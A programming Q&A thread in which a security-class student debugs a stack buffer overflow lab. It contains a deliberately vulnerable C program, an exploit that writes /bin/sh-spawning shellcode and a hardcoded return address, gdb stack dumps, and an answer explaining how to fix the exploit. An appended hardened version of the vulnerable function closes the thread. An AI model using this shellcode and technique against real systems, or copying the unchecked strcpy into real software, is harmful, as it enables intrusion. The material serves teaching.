Getting SIGILL when trying to run a buffer overflow attack

Date: 2011-09-30 22:47:37

Tags: c buffer-overflow

I'm working on a buffer overflow project for my security class and I think I have everything set up, but when I run it I get:

Program received signal SIGILL, Illegal Instruction.
0x08048500 in main(argc=4854718, argv=0x0804b008) at stack.c:22
22       fread(str,sizeof(char),517,badfile);

Here's stack.c

#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];
    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}

Here's exploit.c

#include <stdio.h>
#include <string.h>

char code[] =
"\x31\xc0"                      // xorl         %eax,%eax
"\x50"                          // pushl        %eax
"\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e
"\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f
"\x89\xe3"                      // movl         %esp,%ebx
"\x99"                          // cltd
"\x52"                          // pushl        %edx
"\x53"                          // pushl        %ebx
"\x89\xe1"                      // movl         %esp,%ecx
"\xb0\x0b"                      // movb         $0xb,%al
"\xcd\x80"                      // int          $0x80
;

char retaddr[] = "\x70\xF2\xFF\xBF";

int main(int argc, char **argv)
{
    char strr[517];
    strr[0] = 'Z';
    strr[1] = 0;
    strr[2] = '\x00';
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    //memcpy(buffer, "EGG=", 4);

    memcpy(buffer, code, 24);

    memcpy(buffer+20, retaddr, 4);

    memcpy(buffer+24, "\x00\x00\x00\x00", 4);

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}

Here's the stack at run time. Starting program: /home/john/stack

Breakpoint 1, bof (
str=0xbffff2b7 "1\300Phn/shh//bi\211\343\231RS\211\341p\362\377\277")
at stack.c:13
13      strcpy(buffer, str);
(gdb) x/12xw $esp
0xbffff270: 0x00000205  0xbffff298  0x004a13be  0x0804b008
0xbffff280: 0xbffff2b7  0x00000205  0xb7fef6c0  0x00584ff4
0xbffff290: 0x00000000  0x00000000  0xbffff4c8  0x0804850f
(gdb) s
14      return 1;
(gdb) x/12xw $esp
0xbffff270: 0xbffff284  0xbffff2b7  0x004a13be  0x0804b008
0xbffff280: 0xbffff2b7  0x6850c031  0x68732f6e  0x622f2f68
0xbffff290: 0x99e38969  0xe1895352  0xbffff270  0x08048500
(gdb) c
Continuing.

Does anyone know why I'm getting SIGILL?

1 answer:

Answer 0 (score: 4)

Because you're executing illegal code. In exploit.c you overwrite offsets 20-23 with the return address: those bytes were previously b0 0b cd 80, which correspond to the last two instructions, mov $0xb,%al and int $0x80. The zero bytes you put in are illegal code.

Since the return address has to be at that specific offset for this target, you need to modify the shellcode so that it doesn't use that data. I'd suggest moving the shellcode past that offset and pointing the return address there, or jumping over the return address so the processor doesn't try to execute it.
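For comparison, here is the checked counterpart of the posted bof()/main(): the same 12-byte buffer and 517-byte read, but the copy is bounded and an unterminated fread() result is handled. This is an added example, not code from the question or the answer; bof_safe, process_badfile and demo_rejects_nop_sled are names chosen for this illustration, and the 0x90-filled payload is constructed to mirror exploit.c.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 12      /* same as buffer[12] in the posted bof() */
#define INPUT_SIZE 517   /* same as str[517] read from badfile */

/* Hardened counterpart of bof(): copies only input that fits and reports
 * rejection instead of silently overwriting the saved return address.
 * 'avail' is how many bytes of 'str' are valid (what fread() returned).
 * Returns 1 on success, 0 if the input would overflow the buffer. */
int bof_safe(const char *str, size_t avail)
{
    char buffer[BUF_SIZE];
    /* memchr never reads past 'avail', so a 517-byte read with no NUL
     * (exactly what exploit.c produces) cannot run strlen() off the end. */
    const char *nul = memchr(str, '\0', avail);
    size_t len = nul ? (size_t)(nul - str) : avail;
    if (len >= BUF_SIZE)
        return 0;               /* no room for the bytes plus a NUL */
    memcpy(buffer, str, len);
    buffer[len] = '\0';
    return 1;
}

/* Mirrors main() from the question: read up to INPUT_SIZE bytes from the
 * file and pass them, with their real length, to the checked copy.
 * Returns -1 if the file cannot be opened, else bof_safe()'s result. */
int process_badfile(const char *path)
{
    char str[INPUT_SIZE];
    FILE *badfile = fopen(path, "rb");
    if (badfile == NULL)
        return -1;
    size_t n = fread(str, sizeof(char), INPUT_SIZE, badfile);
    fclose(badfile);
    return bof_safe(str, n);
}

/* Constructed input modelled on exploit.c: 517 bytes of 0x90 and no
 * terminator. The posted bof() would smash the stack; bof_safe() refuses. */
int demo_rejects_nop_sled(void)
{
    char payload[INPUT_SIZE];
    memset(payload, 0x90, sizeof payload);
    return bof_safe(payload, sizeof payload);
}
```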